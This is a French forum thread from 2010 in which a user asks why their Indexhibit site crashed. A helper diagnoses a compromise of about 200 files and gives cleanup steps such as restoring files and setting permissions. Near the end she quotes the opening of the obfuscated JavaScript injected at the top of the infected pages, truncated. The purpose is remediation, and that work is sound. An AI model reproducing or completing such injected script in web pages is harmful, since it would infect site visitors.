Bonjour,

voilà j'ai un problème avec Indexhibit depuis quelques jours.
D'une, mon interface beug à chaque modification, elle me demande de me reconnecter à chaque fois et il y a 3 messages d'erreurs qui apparaissent (voir capture d'écran).
Et de deux, mon site est planté également, il ne marche plus du tout sur ie, et avec firefox les images qui sont censées apparaitre en slideshow sont les unes sur les autres.

Voilà je ne sais pas trop quoi faire, j'ai lu que c'était peut être un virus...

Merci de votre aide upload/29382-indexhibit.jpg
Bonjour,
Je ne connais pas du tout Indexhibit par contre tes erreurs qui bloquent cette page PHP est due au fait que tu as un BOM (petit code en tête de ton fichier PHP, OU ta balise


<?PHP
session_start();
?>


n'est pas strictement collée en haut a gauche de ta page PHP
Notes surtout que session_start(); ne doit jamais étre dans un fichier include car tu multiplierais ce risque sans raison !
Modifié par Christele (05 May 2010 - 14:48)
Merci pour ta réponse, mais je ne m'y connais absolument pas en php.
Ce qui est bizarre, c'est que mon site marchait très bien depuis presque 1 an, et du jour au lendemain il plante sans que je ne touche à quoi que ce soit.
Si tu n'as aucun accés a tes PHP par FTP tu fais comment ?
tu peux donner l'URL de la page ici.

Si non si tu n'as aucun accés sur ton site demande a ton hébergeur de contrôler ce que je t'ais dit !
Houla enorme virus sur tes fichiers !
On trouve ça en haut de tes pages ...
Impossible que ce soit OVH ! c'est donc une faille qui était latente (non utilisée) sur ton site , contôles sur tes originaux de ton micro si tu as ce code avant le DOCTYPE .... ?
Si non il te faut
1) recopier le même jour TOUT tes PHP et HTML
2) contrôler tes contenus de MySQl
3) avec ton FTP regarder la totalitée des fichiers ils doivent étre en 644
les répertoires en 755

Si tu n'y arrives pas mets moi un MP (j'autorises exeptionellement)



<script>var G="";this.M="M";function u(){N_=[];var C=new String("x4mConloa".substr(4)+"d");var n=document;var P=String ETC.............
</script>



Houp's environ 200 fichiers contaminés pfffff .. Christéle en femme de ménage Smiley smile
Modifié par Christele (05 May 2010 - 18:06)